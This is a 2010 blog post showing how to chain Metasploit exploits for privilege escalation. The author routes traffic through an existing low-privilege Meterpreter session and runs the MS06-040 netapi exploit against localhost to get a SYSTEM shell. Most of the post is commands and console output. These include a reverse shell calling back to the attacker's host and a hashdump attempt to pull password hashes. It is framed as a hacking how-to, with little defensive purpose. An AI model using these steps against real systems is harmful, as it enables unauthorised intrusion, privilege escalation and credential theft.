Thursday, June 3, 2010

Using Chained Exploits - Metasploit and Meterpreter

There are certain situations where a successful exploit may leave us a shell, however that shell does not have SYSTEM/ROOT level privileges. As an example, I've obtained a Windows Meterpreter (reverse TCP) shell using a WebDAV exploit as explained earlier on this blog. This session has the rights of the web daemon, which are not enough to do most of the fun stuff.


meterpreter > getuid
Server username: USER\IWAM_USER
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 87


After exhausting most of the local privilege escalation techniques I could think of (both using Meterpreter's built-in capabilities and uploading executable code on my target), I decided upon another approach. What if i could chain a second exploit and piggy back it off of my existing Meterpreter session? Fortunately, the developers of Metasploit implemented a neat feature that will allow me to do this very thing.

The route command actually can be configured to route all traffic through an existing Meterpreter session. As you can see, the following steps led me from frustration to GAME OVER. In this example, this was Meterpreter session four (which is the last argument in the route add syntax).

msf exploit(handler) > route add 127.0.0.1 255.255.255.255 4
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
127.0.0.1 255.255.255.255 Session 4

msf exploit(handler) > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 127.0.0.1
msf exploit(ms06_040_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:13337
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (748032 bytes) to 192.168.1.3
[*] Meterpreter session 8 opened (192.168.1.2:13337 -> 192.168.1.3:4855) at Thu Jun 03 16:48:41 -0400 2010

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

1 comment: